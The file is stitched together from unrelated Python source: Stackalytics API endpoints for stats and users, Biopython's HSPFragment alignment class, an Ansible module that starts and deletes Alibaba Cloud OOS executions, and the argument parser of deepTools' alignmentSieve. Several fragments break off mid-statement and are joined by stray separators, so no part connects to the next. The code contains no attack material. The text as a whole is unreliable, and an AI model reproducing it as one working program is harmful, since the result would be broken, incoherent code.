@decorators.response()
@decorators.cached(ignore=['release', 'project_type', 'module'])
@decorators.jsonify('members')
@decorators.record_filter(ignore=['release', 'project_type', 'module'])
def get_members(records, **kwargs):
response = []
for record in records:
record = vault.extend_record(record)
nr = dict([(k, record[k]) for k in
['author_name', 'date', 'company_name', 'member_uri']])
nr['date_str'] = helpers.format_date(nr['date'])
response.append(nr)
response.sort(key=lambda x: x['date'], reverse=True)
utils.add_index(response)
return response
@app.route('/api/1.0/stats/bp')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('stats')
@decorators.record_filter()
def get_bpd(records, **kwargs):
result = []
for record in records:
if record.record_type in ['bpd', 'bpc']:
record = vault.extend_record(record)
mention_date = record.get('mention_date')
if mention_date:
date = helpers.format_date(mention_date)
else:
date = 'never'
result.append({
'date': date,
'status': record['lifecycle_status'],
'metric': record.get('mention_count') or 0,
'id': record['name'],
'name': record['name'],
'link': helpers.make_blueprint_link(record['module'],
record['name'])
})
result.sort(key=lambda x: x['metric'], reverse=True)
utils.add_index(result)
return result
@app.route('/api/1.0/languages')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['language'])
@decorators.jsonify()
@decorators.record_filter(ignore=['language'])
def get_languages_json(record_ids, **kwargs):
memory_storage = vault.get_memory_storage()
languages = set(r.value for r in memory_storage.get_records(record_ids))
return [{'id': c.lower().replace('&', ''), 'text': c}
for c in sorted(languages)]
@app.route('/api/1.0/stats/languages')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('stats')
@decorators.record_filter(ignore=['language'])
def get_languages(records, **kwargs):
result = []
languages = collections.defaultdict(int)
for record in records:
if record.record_type in ['tr']:
languages[record.value] += record.loc
for lang, val in six.iteritems(languages):
result.append({
'id': lang,
'name': lang,
'metric': val,
})
result.sort(key=lambda x: x['metric'], reverse=True)
utils.add_index(result)
return result
@app.route('/api/1.0/users')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=['user_id'])
@decorators.jsonify()
@decorators.record_filter(ignore=['user_id'])
def get_users_json(record_ids, **kwargs):
core_in = parameters.get_single_parameter(kwargs, 'core_in') or None
valid_modules = set()
if core_in:
core_in = set(core_in.split(','))
valid_modules = vault.resolve_project_types(
kwargs['_params']['project_type'])
valid_modules = set(m[0] for m in vault.resolve_modules(
valid_modules, kwargs['_params']['release']))
user_ids = vault.get_memory_storage().get_index_keys_by_record_ids(
'user_id', record_ids)
if kwargs['_params']['user_id']:
user_ids.add(kwargs['_params']['user_id'][0])
result = []
for user_id in user_ids:
user = vault.get_user_from_runtime_storage(user_id)
r = {'id': user_id, 'text': user.get('user_name') or user['user_id']}
add_flag = not core_in
if core_in and user.get('core'):
core_modules = [module_branch[0] for module_branch in user['core']
if (module_branch[1] in core_in and
module_branch[0] in valid_modules)]
if core_modules:
r['core'] = core_modules
if user['companies']:
r['company_name'] = helpers.get_current_company(user)
add_flag = True
if add_flag:
result.append(r)
result.sort(key=lambda x: x['text'])
return result
@app.route('/api/1.0/users/<user_id>')
@decorators.response()
@decorators.jsonify('user')
def get_user(user_id):
user = vault.get_user_from_runtime_storage(user_id)
if not user:
flask.abort(404)
user = helpers.extend_user(user)
return user
@app.route('/api/1.0/releases')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=parameters.FILTER_PARAMETERS)
@decorators.jsonify(root=('data', 'default'))
def get_releases_json(**kwargs):
releases = [{'id': release['release_name'],
'text': release['release_name'].capitalize(),
'project': release.get('project')}
for release in vault.get_vault()['releases'].values()]
releases.append({'id': 'all', 'text': 'All'})
releases.reverse()
return (releases, parameters.get_default('release'))
@app.route('/api/1.0/metrics')
@decorators.exception_handler()
@decorators.response()
@decorators.cached(ignore=parameters.FILTER_PARAMETERS)
@decorators.jsonify(root=('data', 'default'))
def get_metrics_json(**kwargs):
return (sorted([{'id': m, 'text': t} for m, t in
six.iteritems(parameters.METRIC_LABELS)],
key=operator.itemgetter('text')),
parameters.get_default('metric'))
@app.route('/api/1.0/project_types')
@decorators.response()
@decorators.exception_handler()
@decorators.cached(ignore=parameters.FILTER_PARAMETERS)
@decorators.jsonify(root=('data', 'default'))
def get_project_types_json(**kwargs):
return ([{'id': pt['id'], 'text': pt['title'],
'child': pt.get('child', False)}
for pt in vault.get_project_types()],
parameters.get_default('project_type'))
@app.route('/api/1.0/affiliation_changes')
@decorators.exception_handler()
@decorators.response()
@decorators.jsonify('affiliation_changes')
def get_company_changes(**kwargs):
start_days = str(flask.request.args.get('start_days') or
utils.timestamp_to_date(int(time.time()) -
365 * 24 * 60 * 60))
end_days = str(flask.request.args.get('end_days') or
utils.timestamp_to_date(int(time.time())))
start_date = utils.date_to_timestamp_ext(start_days)
end_date = utils.date_to_timestamp_ext(end_days)
runtime_storage = vault.get_runtime_storage()
result = []
for user in runtime_storage.get_all_users():
companies = user.get('companies') or []
if len(companies) < 2:
continue
companies_iter = iter(companies)
company = companies_iter.next()
old_company_name = company['company_name']
date = company['end_date']
for company in companies_iter:
new_company_name = company['company_name']
if start_date <= date <= end_date:
result.append({
'user_id': user['user_id'],
'user_name': user['user_name'],
'old_company_name': old_company_name,
'new_company_name': new_company_name,
'date': date,
})
old_company_name = new_company_name
date = company['end_date']
return result
def _get_week(kwargs, param_name):
date_param = parameters.get_single_parameter(kwargs, param_name)
if date_param:
ts = utils.date_to_timestamp_ext(date_param)
else:
ts = vault.get_vault()[param_name]
return utils.timestamp_to_week(ts)
@app.route('/api/1.0/stats/timeline')
@decorators.exception_handler()
@decorators.response()
@decorators.cached()
@decorators.jsonify('timeline')
@decorators.record_filter(ignore=['release', 'start_date'])
def timeline(records, **kwargs):
# find start and end dates
metric = parameters.get_parameter(kwargs, 'metric')
start_date = int(parameters.get_single_parameter(kwargs, 'start_date')
or 0)
release_name = parameters.get_single_parameter(kwargs, 'release') or 'all'
releases = vault.get_vault()['releases']
if 'all' in release_name:
start_week = release_start_week = _get_week(kwargs, 'start_date')
end_week = release_end_week = _get_week(kwargs, 'end_date')
else:
release = releases[release_name]
start_week = release_start_week = utils.timestamp_to_week(
release['start_date'])
end_week = release_end_week = utils.timestamp_to_week(
release['end_date'])
now = utils.timestamp_to_week(int(time.time())) + 1
# expand start-end to year if needed
if release_end_week - release_start_week < 52:
expansion = (52 - (release_end_week - release_start_week)) // 2
if release_end_week + expansion < now:
end_week += expansion
else:
end_week = now
start_week = end_week - 52
# empty stats for all weeks in range
weeks = range(start_week, end_week)
week_stat_loc = dict((c, 0) for c in weeks)
week_stat_commits = dict((c, 0) for c in weeks)
week_stat_commits_hl = | |
= allitems('hit_end',
doc="""List of all fragments' hit end coordinates""")
query_end_all = allitems('query_end',
doc="""List of all fragments' query end coordinates""")
hit_span_all = allitems('hit_span',
doc="""List of all fragments' hit sequence size""")
query_span_all = allitems('query_span',
doc="""List of all fragments' query sequence size""")
hit_range_all = allitems('hit_range',
doc="""List of all fragments' hit start and end coordinates""")
query_range_all = allitems('query_range',
doc="""List of all fragments' query start and end coordinates""")
class HSPFragment(_BaseHSP):
"""Class representing a contiguous alignment of hit-query sequence.
HSPFragment forms the core of any parsed search output file. Depending on
the search output file format, it may contain the actual query and/or hit
sequences that produces the search hits. These sequences are stored as
SeqRecord objects (see SeqRecord):
>>> from Bio import SearchIO
>>> qresult = next(SearchIO.parse('Blast/mirna.xml', 'blast-xml'))
>>> fragment = qresult[0][0][0] # first hit, first hsp, first fragment
>>> print(fragment)
Query: 33211 mir_1
Hit: gi|262205317|ref|NR_030195.1| Homo sapiens microRNA 520b (MIR520...
Query range: [0:61] (1)
Hit range: [0:61] (1)
Fragments: 1 (61 columns)
Query - CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAGTGCTTCCTTTTAGAGGG
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Hit - CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAGTGCTTCCTTTTAGAGGG
# the query sequence is a SeqRecord object
>>> fragment.query.__class__
<class 'Bio.SeqRecord.SeqRecord'>
>>> print(fragment.query)
ID: 33211
Name: aligned query sequence
Description: mir_1
Number of features: 0
Seq('CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAGTGCTTCCTTT...GGG', DNAAlphabet())
# the hit sequence is a SeqRecord object as well
>>> fragment.hit.__class__
<class 'Bio.SeqRecord.SeqRecord'>
>>> print(fragment.hit)
ID: gi|262205317|ref|NR_030195.1|
Name: aligned hit sequence
Description: Homo sapiens microRNA 520b (MIR520B), microRNA
Number of features: 0
Seq('CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAGTGCTTCCTTT...GGG', DNAAlphabet())
# when both query and hit are present, we get a MultipleSeqAlignment object
>>> fragment.aln.__class__
<class 'Bio.Align.MultipleSeqAlignment'>
>>> print(fragment.aln)
DNAAlphabet() alignment with 2 rows and 61 columns
CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAG...GGG 33211
CCCTCTACAGGGAAGCGCTTTCTGTTGTCTGAAAGAAAAGAAAG...GGG gi|262205317|ref|NR_030195.1|
"""
def __init__(self, hit_id='<unknown id>', query_id='<unknown id>',
hit=None, query=None, alphabet=single_letter_alphabet):
"""Initialize the class."""
self._alphabet = alphabet
self.aln_annotation = {}
self._hit_id = hit_id
self._query_id = query_id
for seq_type in ('query', 'hit'):
# query or hit attributes default attributes
setattr(self, '_%s_description' % seq_type, '<unknown description>')
setattr(self, '_%s_features' % seq_type, [])
# query or hit attributes whose default attribute is None
for attr in ('strand', 'frame', 'start', 'end'):
setattr(self, '%s_%s' % (seq_type, attr), None)
# self.query or self.hit
if eval(seq_type):
setattr(self, seq_type, eval(seq_type))
else:
setattr(self, seq_type, None)
def __repr__(self):
info = "hit_id=%r, query_id=%r" % (self.hit_id, self.query_id)
try:
info += ", %i columns" % len(self)
except AttributeError:
pass
return "%s(%s)" % (self.__class__.__name__, info)
def __len__(self):
return self.aln_span
def __str__(self):
return self._str_hsp_header() + '\n' + self._str_aln()
def __getitem__(self, idx):
if self.aln is not None:
obj = self.__class__(
hit_id=self.hit_id, query_id=self.query_id,
alphabet=self.alphabet)
# transfer query and hit attributes
# let SeqRecord handle feature slicing, then retrieve the sliced
# features into the sliced HSPFragment
if self.query is not None:
obj.query = self.query[idx]
obj.query_features = obj.query.features
if self.hit is not None:
obj.hit = self.hit[idx]
obj.hit_features = obj.hit.features
# description, strand, frame
for attr in ('description', 'strand', 'frame'):
for seq_type in ('hit', 'query'):
attr_name = '%s_%s' % (seq_type, attr)
self_val = getattr(self, attr_name)
setattr(obj, attr_name, self_val)
# alignment annotation should be transferred, since we can compute
# the resulting annotation
obj.aln_annotation = {}
for key, value in self.aln_annotation.items():
assert len(value[idx]) == len(obj)
obj.aln_annotation[key] = value[idx]
return obj
else:
raise TypeError("Slicing for HSP objects without "
"alignment is not supported.")
def _str_aln(self):
lines = []
# alignment length
aln_span = getattr_str(self, 'aln_span')
lines.append(' Fragments: 1 (%s columns)' % aln_span)
# sequences
if self.query is not None and self.hit is not None:
try:
qseq = str(self.query.seq)
except AttributeError: # query is None
qseq = '?'
try:
hseq = str(self.hit.seq)
except AttributeError: # hit is None
hseq = '?'
# similarity line
simil = ''
if 'similarity' in self.aln_annotation and \
isinstance(self.aln_annotation.get('similarity'), basestring):
simil = self.aln_annotation['similarity']
if self.aln_span <= 67:
lines.append("%10s - %s" % ('Query', qseq))
if simil:
lines.append(" %s" % simil)
lines.append("%10s - %s" % ('Hit', hseq))
else:
# adjust continuation character length, so we don't display
# the same residues twice
if self.aln_span - 66 > 3:
cont = '~' * 3
else:
cont = '~' * (self.aln_span - 66)
lines.append("%10s - %s%s%s" % ('Query',
qseq[:59], cont, qseq[-5:]))
if simil:
lines.append(" %s%s%s" %
(simil[:59], cont, simil[-5:]))
lines.append("%10s - %s%s%s" % ('Hit',
hseq[:59], cont, hseq[-5:]))
return '\n'.join(lines)
# sequence properties #
def _set_seq(self, seq, seq_type):
"""Check the given sequence for attribute setting (PRIVATE).
:param seq: sequence to check
:type seq: string or SeqRecord
:param seq_type: sequence type
:type seq_type: string, choice of 'hit' or 'query'
"""
assert seq_type in ('hit', 'query')
if seq is None:
return seq # return immediately if seq is None
else:
if not isinstance(seq, (basestring, SeqRecord)):
raise TypeError("%s sequence must be a string or a SeqRecord"
" object." % seq_type)
# check length if the opposite sequence is not None
opp_type = 'hit' if seq_type == 'query' else 'query'
opp_seq = getattr(self, '_%s' % opp_type, None)
if opp_seq is not None:
if len(seq) != len(opp_seq):
raise ValueError("Sequence lengths do not match. Expected: "
"%r (%s); found: %r (%s)." % (len(opp_seq), opp_type,
len(seq), seq_type))
seq_id = getattr(self, '%s_id' % seq_type)
seq_desc = getattr(self, '%s_description' % seq_type)
seq_feats = getattr(self, '%s_features' % seq_type)
seq_name = 'aligned %s sequence' % seq_type
if isinstance(seq, SeqRecord):
seq.id = seq_id
seq.description = seq_desc
seq.name = seq_name
seq.features = seq_feats
seq.seq.alphabet = self.alphabet
elif isinstance(seq, basestring):
seq = SeqRecord(Seq(seq, self.alphabet), id=seq_id, name=seq_name,
description=seq_desc, features=seq_feats)
return seq
def _hit_get(self):
return self._hit
def _hit_set(self, value):
self._hit = self._set_seq(value, 'hit')
hit = property(fget=_hit_get, fset=_hit_set,
doc="""Hit sequence as a SeqRecord object, defaults to None""")
def _query_get(self):
return self._query
def _query_set(self, value):
self._query = self._set_seq(value, 'query')
query = property(fget=_query_get, fset=_query_set,
doc="""Query sequence as a SeqRecord object, defaults to None""")
def _aln_get(self):
if self.query is None and self.hit is None:
return None
elif self.hit is None:
return MultipleSeqAlignment([self.query], self.alphabet)
elif self.query is None:
return MultipleSeqAlignment([self.hit], self.alphabet)
else:
return MultipleSeqAlignment([self.query, self.hit], self.alphabet)
aln = property(fget=_aln_get,
doc="""Query-hit alignment as a MultipleSeqAlignment object,
defaults to None""")
def _alphabet_get(self):
return self._alphabet
def _alphabet_set(self, value):
self._alphabet = value
try:
self.query.seq.alphabet = value
except AttributeError:
pass
try:
self.hit.seq.alphabet = value
except AttributeError:
pass
alphabet = property(fget=_alphabet_get, fset=_alphabet_set,
doc="""Alphabet object used in the fragment's sequences and alignment,
defaults to single_letter_alphabet""")
def _aln_span_get(self):
# length of alignment (gaps included)
# alignment span can be its own attribute, or computed from
# query / hit length
if not hasattr(self, '_aln_span'):
if self.query is not None:
self._aln_span = len(self.query)
elif self.hit is not None:
self._aln_span = len(self.hit)
return self._aln_span
def _aln_span_set(self, value):
self._aln_span = value
aln_span = property(fget=_aln_span_get, fset=_aln_span_set,
doc="""The number of alignment columns covered by the fragment""")
# id, description, and features properties #
hit_description = fragcascade('description', 'hit',
doc="""Hit sequence description""")
query_description = fragcascade('description', 'query',
doc="""Query sequence description""")
hit_id = fragcascade('id', 'hit',
doc="""Hit sequence ID""")
query_id = fragcascade('id', 'query',
doc="""Query sequence ID""")
hit_features = fragcascade('features', 'hit',
doc="""Hit sequence features""")
query_features = fragcascade('features', 'query',
doc="""Query sequence features""")
# strand properties #
def _prep_strand(self, strand):
# follow SeqFeature's convention
if strand not in (-1, 0, 1, None):
raise ValueError("Strand should be -1, 0, 1, or None; not %r" %
strand)
return strand
def _get_strand(self, seq_type):
assert seq_type in ('hit', 'query')
strand = getattr(self, '_%s_strand' % seq_type)
if strand is None:
# try to compute strand from frame
frame = getattr(self, '%s_frame' % seq_type)
if frame is not None:
try:
strand = frame // abs(frame)
except ZeroDivisionError:
strand = 0
setattr(self, '%s_strand' % seq_type, strand)
return strand
def _hit_strand_get(self):
return self._get_strand('hit')
def _hit_strand_set(self, value):
self._hit_strand = self._prep_strand(value)
hit_strand = property(fget=_hit_strand_get, fset=_hit_strand_set,
doc="""Hit sequence strand, defaults to None""")
def _query_strand_get(self):
return self._get_strand('query')
def _query_strand_set(self, value):
self._query_strand = self._prep_strand(value)
query_strand = property(fget=_query_strand_get, fset=_query_strand_set,
doc="""Query sequence strand, defaults to None""")
# frame properties #
def _prep_frame(self, frame):
if frame not in (-3, -2, -1, 0, 1, 2, 3, None):
raise ValueError("Strand should be an integer between -3 and 3, "
"or None; not %r" % frame)
return frame
def _hit_frame_get(self):
return self._hit_frame
def _hit_frame_set(self, value):
self._hit_frame = self._prep_frame(value)
hit_frame = property(fget=_hit_frame_get, fset=_hit_frame_set,
doc="""Hit sequence reading frame, defaults | |
<gh_stars>10-100
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2017-present Alibaba Group Holding Limited. <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see http://www.gnu.org/licenses/.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: ali_oos_execution
short_description: Configure Execution Alibaba Cloud Operation Orchestration Service(OOS)
description:
- Create, Delete, Notify, Cancel Execution.
options:
state:
description:
- If I(state=present), execution will be started.
- If I(state=absent), execution will be deleted.
- If I(state=cancel), execution will be canceled.
- If I(state=notify), It will notify a pending execution of how to run next.
choices: ['present', 'absent', 'cancel', 'notify']
type: str
default: 'present'
task_execution_id:
description:
- The id of task execution.
type: str
task_name:
description:
- The name of task execution.
type: str
notify_note:
description:
- The note of notify.
type: str
loop_item:
description:
- Loop child nodes corresponding to Item data.
type: str
execution_status:
description:
- The status of execution.
- Required when C(notify_type=CompleteExecution)
type: str
notify_type:
description:
- The type of notify.
- If C(notify_type=Approve), approval of pending execution. If you know the execution risks of high-risk operations, and allow them to perform.
- If C(notify_type=Reject), reject execution pending approval. If high-risk operations are not allowed to perform tasks.
- If C(notify_type=ExecuteTask), specifies the start of the execution of a task, suitable for Debug mode. May need to cooperate with I(parameters).
- If C(notify_type=CancelTask), cancel current task execution, applicable to when C(mode=Debug).
- If C(notify_type=CompleteExecution), manually terminate execution in a debug mode. Can be used with the I(execution_status) to specify the status of execution termination.
choices: ['Approve', 'Reject', 'ExecuteTask', 'CancelTask', 'CompleteExecution']
type: str
executed_by:
description:
- The user executed execution.
- when you want to cancel,delete or notify executions, you can pass it to filter executions, except it,
filter params supported include (I(template_name), I(status), I(execution_ids))
type: str
status:
description:
- The status of execution.
- when you want to cancel,delete or notify executions, you can pass it to filter executions, except it,
filter params supported include (I(template_name), I(executed_by), I(execution_ids))
type: str
safety_check:
description:
- Security check mode.
- If C(safety_check=Skip), means that the customer understands the risk and can perform any action without confirmation,
regardless of the level of risk. Effective when C(mode=Automatic).
- If C(safety_check=ConfirmEveryHighRiskAction), will ask the customer to confirm each high-risk action.
The client confirms or cancels by calling the NotifyExecution interface.
type: str
default: ConfirmEveryHighRiskAction
choices: ['Skip', 'ConfirmEveryHighRiskAction']
parent_execution_id:
description:
- The id of parent execution.
type: str
parameters:
description:
- Consists of a collection of parameters.
type: dict
mode:
description:
- The execution mode.
type: str
choices: ['Debug', 'Automatic']
loop_mode:
description:
- The Loop mode.
type: str
template_name:
description:
- The name of template.
- when you want to start a execution, It is required.
- when you want to cancel,delete or notify executions, you can pass it to filter executions, except it,
filter params supported include (I(status), I(executed_by), I(execution_ids))
type: str
description:
description:
- The description of execution.
type: str
execution_ids:
description:
- The ids of executions.
- when you want to cancel,delete or notify executions, you can pass it to filter executions, except it,
filter params supported include (I(status), I(executed_by), I(template_name))
type: list
elements: str
tags:
description:
- A hash/dictionaries of template tags. C({"key":"value"})
type: dict
requirements:
- "python >= 3.6"
- "footmark >= 1.20.0"
extends_documentation_fragment:
- alicloud
author:
- "<NAME> (@xiaozhu36)"
- "<NAME> (@lixue323)"
"""
EXAMPLES = """
# Note: These examples do not set authentication details, see the Alibaba Cloud Guide for details.
- name: Changed. Start a timed execution that starts and closes instances
ali_oos_execution:
template_name: 'ACS-ECS-ScheduleToStartAndStopInstances'
safety_check: Skip
description: test execution from ansible
parameters:
dailyStartTime: 08:00:00Z
dailyStopTime: dailyStopTime
weekdays: '2'
targets:
Type: ResourceIds
ResourceIds:
- 'instances_id'
tags:
From: ansible
- name: Changed. cancel a timed execution
ali_oos_execution:
state: cancel
template_name: 'ACS-ECS-ScheduleToStartAndStopInstances'
- name: Changed. Delete a execution
ali_oos_execution:
state: absent
template_name: 'ACS-ECS-ScheduleToStartAndStopInstances'
- name: Changed. Start a risky execution that deletes instances
ali_oos_execution:
template_name: 'ACS-ECS-BulkyDeleteInstances'
description: test execution from ansible
parameters:
force: true
targets:
Type: ResourceIds
ResourceIds:
- 'instances_id'
- name: Changed. notify a execution
ali_oos_execution:
state: notify
notify_type: Approve
template_name: 'ACS-ECS-BulkyDeleteInstances'
- name: Changed. Delete a execution
ali_oos_execution:
state: absent
template_name: 'ACS-ECS-BulkyDeleteInstances'
"""
RETURN = '''
executions:
description: info about the executions that was started, notified
returned: always
type: complex
contains:
execution_id:
description: The id of execution.
returned: always
type: str
sample: exec-xxxyyy
id:
description: aliases of execution_id.
returned: always
type: str
sample: exec-xxxyyy
is_parent:
description: Have child task or not.
returned: always
type: bool
sample: false
loop_mode:
description: The loop mode.
returned: always
type: str
sample: Automatic
mode:
description: mode of execution.
returned: always
type: str
sample: Automatic
out_puts:
description: The output of execution.
returned: always
type: str
sample: {"InstanceId":"i-xxx"}
parameters:
description: The parameters of execution.
returned: always
type: str
sample: {"Status":"Running"}
parent_execution_id:
description: The id of parent execution.
returned: always
type: str
sample: exec-xxxx
ram_role:
description: The ram role of execution.
returned: always
type: str
sample: OOSServiceRole
safety_check:
description: The security check mode.
returned: always
type: str
sample: Skip
description:
description: The description of execution.
returned: always
type: str
sample: run instance
start_date:
description: The start date of the execution.
returned: always
type: str
sample: "2019-05-16T10:26:14Z"
status:
description: The status of the execution.
returned: always
type: str
sample: Success
status_message:
description: The message of the status.
returned: always
type: str
sample: ""
template_id:
description: The id of the template.
returned: always
type: str
sample: t-1bd341007f
template_name:
description: The name of the template.
returned: always
type: str
sample: MyTemplate
template_version:
description: The version of template.
returned: always
type: str
sample: v1
update_date:
description: The update date of template.
returned: always
type: str
sample: "2019-05-16T10:26:14Z"
executed_by:
description: The template executor.
returned: always
type: str
sample: root(13092080xx12344)
end_date:
description: The end date of execution.
returned: always
type: str
sample: "2019-05-16T10:26:14Z"
task_name:
description: The name of task.
returned: always
type: str
sample: waitForReady
task_execution_id:
description: The id of task execution.
returned: always
type: str
sample: exec-xxxyyy.0001
task_action:
description: The action of task.
returned: always
type: str
sample: ACS::WaitFor
'''
import time
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.alicloud_ecs import ecs_argument_spec, oos_connect
HAS_FOOTMARK = False
try:
from footmark.exception import OOSResponseError
HAS_FOOTMARK = True
except ImportError:
HAS_FOOTMARK = False
def executions_exists(module, oos_conn):
try:
executions = []
if module.params.get('execution_ids'):
for i in module.params.get('execution_ids'):
executions.extend(oos_conn.list_executions(execution_id=i))
elif module.params.get('params'):
executions.extend(oos_conn.list_executions(**module.params['params']))
ids = []
if executions:
for e in executions:
ids.append(e.id)
else:
module.fail_json(msg="Failed to list executions, please make sure your params are correct")
return ids
except Exception as e:
module.fail_json(msg="Failed to list templates: {0}".format(e))
def main():
argument_spec = ecs_argument_spec()
argument_spec.update(dict(
state=dict(default='present', choices=['present', 'absent', 'cancel', 'notify']),
execution_ids=dict(type='list', elements='str'),
description=dict(type='str'),
template_name=dict(type='str', aliases=['name']),
loop_mode=dict(type='str'),
mode=dict(type='str', choices=['Debug', 'Automatic']),
parameters=dict(type='dict'),
parent_execution_id=dict(type='str'),
safety_check=dict(type='str', default='ConfirmEveryHighRiskAction', choices=['Skip', 'ConfirmEveryHighRiskAction']),
tags=dict(type='dict'),
status=dict(type='str'),
executed_by=dict(type='str'),
notify_type=dict(type='str', choices=['Approve', 'Reject', 'ExecuteTask', 'CancelTask', 'CompleteExecution']),
execution_status=dict(type='str'),
loop_item=dict(type='str'),
notify_note=dict(type='str'),
task_execution_id=dict(type='str'),
task_name=dict(type='str')
))
module = AnsibleModule(argument_spec=argument_spec)
if HAS_FOOTMARK is False:
module.fail_json(msg='footmark required for this module.')
oos_conn = oos_connect(module)
# Get values of variable
state = module.params['state']
template_name = module.params['template_name']
status = module.params['status']
executed_by = module.params['executed_by']
params = {}
if template_name:
params['template_name'] = template_name
if status:
params['status'] = status
if executed_by:
params['executed_by'] = executed_by
changed = False
if params:
module.params['params'] = params
if state == 'absent':
ids = executions_exists(module, oos_conn)
try:
if oos_conn.delete_executions(execution_ids=ids):
changed = True
module.exit_json(changed=changed, executions={})
except OOSResponseError as e:
module.fail_json(msg='Unable to delete executions {0}, error: {1}'.format(str(ids), e))
elif state == | |
<gh_stars>100-1000
#!/usr/bin/env python
import argparse
import pysam
import os
import sys
from deeptools import parserCommon
from deeptools.bamHandler import openBam
from deeptools.mapReduce import mapReduce
from deeptools._version import __version__
from deeptools.utilities import getTLen, smartLabels, getTempFileName
def parseArguments():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="This tool filters alignments in a BAM/CRAM file according the the specified parameters. It can optionally output to BEDPE format.",
usage='Example usage: alignmentSieve.py -b sample1.bam -o sample1.filtered.bam --minMappingQuality 10 --filterMetrics log.txt')
required = parser.add_argument_group('Required arguments')
required.add_argument('--bam', '-b',
metavar='FILE1',
help='An indexed BAM file.',
required=True)
required.add_argument('--outFile', '-o',
help='The file to write results to. These are the alignments or fragments that pass the filtering criteria.')
general = parser.add_argument_group('General arguments')
general.add_argument('--numberOfProcessors', '-p',
help='Number of processors to use. Type "max/2" to '
'use half the maximum number of processors or "max" '
'to use all available processors. (Default: %(default)s)',
metavar="INT",
type=parserCommon.numberOfProcessors,
default=1,
required=False)
general.add_argument('--filterMetrics',
metavar="FILE.log",
help="The number of entries in total and filtered are saved to this file")
general.add_argument('--filteredOutReads',
metavar="filtered.bam",
help="If desired, all reads NOT passing the filtering criteria can be written to this file.")
general.add_argument('--label', '-l',
metavar='sample1',
help='User defined label instead of the default label '
'(file name).')
general.add_argument('--smartLabels',
action='store_true',
help='Instead of manually specifying a labels for the input '
'file, this causes deepTools to use the file name '
'after removing the path and extension.')
general.add_argument('--verbose', '-v',
help='Set to see processing messages.',
action='store_true')
general.add_argument('--version', action='version',
version='%(prog)s {}'.format(__version__))
general.add_argument('--shift',
nargs='+',
type=int,
help='Shift the left and right end of a read (for BAM files) or a fragment (for BED files). A positive value shift an end to the right (on the + strand) and a negative value shifts a fragment to the left. Either 2 or 4 integers can be provided. For example, "2 -3" will shift the left-most fragment end two bases to the right and the right-most end 3 bases to the left. If 4 integers are provided, then the first and last two refer to fragments whose read 1 is on the left or right, respectively. Consequently, it is possible to take strand into consideration for strand-specific protocols. A fragment whose length falls below 1 due to shifting will not be written to the output. See the online documentation for graphical examples. Note that non-properly-paired reads will be filtered.')
general.add_argument('--ATACshift',
action='store_true',
help='Shift the produced BAM file or BEDPE regions as commonly done for ATAC-seq. This is equivalent to --shift 4 -5 5 -4.')
output = parser.add_argument_group('Output arguments')
output.add_argument('--BED',
action='store_true',
help='Instead of producing BAM files, write output in BEDPE format (as defined by MACS2). Note that only reads/fragments passing filtering criterion are written in BEDPE format.')
filtering = parser.add_argument_group('Optional arguments')
filtering.add_argument('--filterRNAstrand',
help='Selects RNA-seq reads (single-end or paired-end) in '
'the given strand. (Default: %(default)s)',
choices=['forward', 'reverse'],
default=None)
filtering.add_argument('--ignoreDuplicates',
help='If set, reads that have the same orientation '
'and start position will be considered only '
'once. If reads are paired, the mate\'s position '
'also has to coincide to ignore a read.',
action='store_true')
filtering.add_argument('--minMappingQuality',
metavar='INT',
help='If set, only reads that have a mapping '
'quality score of at least this are '
'considered.',
type=int)
filtering.add_argument('--samFlagInclude',
help='Include reads based on the SAM flag. For example, '
'to get only reads that are the first mate, use a flag of 64. '
'This is useful to count properly paired reads only once, '
'as otherwise the second mate will be also considered for the '
'coverage.',
metavar='INT',
default=None,
type=int,
required=False)
filtering.add_argument('--samFlagExclude',
help='Exclude reads based on the SAM flag. For example, '
'to get only reads that map to the forward strand, use '
'--samFlagExclude 16, where 16 is the SAM flag for reads '
'that map to the reverse strand.',
metavar='INT',
default=None,
type=int,
required=False)
filtering.add_argument('--blackListFileName', '-bl',
help="A BED or GTF file containing regions that should be excluded from all analyses. Currently this works by rejecting genomic chunks that happen to overlap an entry. Consequently, for BAM files, if a read partially overlaps a blacklisted region or a fragment spans over it, then the read/fragment might still be considered. Please note that you should adjust the effective genome size, if relevant.",
metavar="BED file",
nargs="+",
required=False)
filtering.add_argument('--minFragmentLength',
help='The minimum fragment length needed for read/pair '
'inclusion. This option is primarily useful '
'in ATACseq experiments, for filtering mono- or '
'di-nucleosome fragments. (Default: %(default)s)',
metavar='INT',
default=0,
type=int,
required=False)
filtering.add_argument('--maxFragmentLength',
help='The maximum fragment length needed for read/pair '
'inclusion. A value of 0 indicates no limit. (Default: %(default)s)',
metavar='INT',
default=0,
type=int,
required=False)
return parser
def shiftRead(b, chromDict, args):
if not b.is_proper_pair:
return None
tLen = getTLen(b, notAbs=True)
start = b.pos
end = start + b.query_alignment_end
if b.is_reverse and not b.is_read2:
end -= args.shift[2]
deltaTLen = args.shift[3] - args.shift[2]
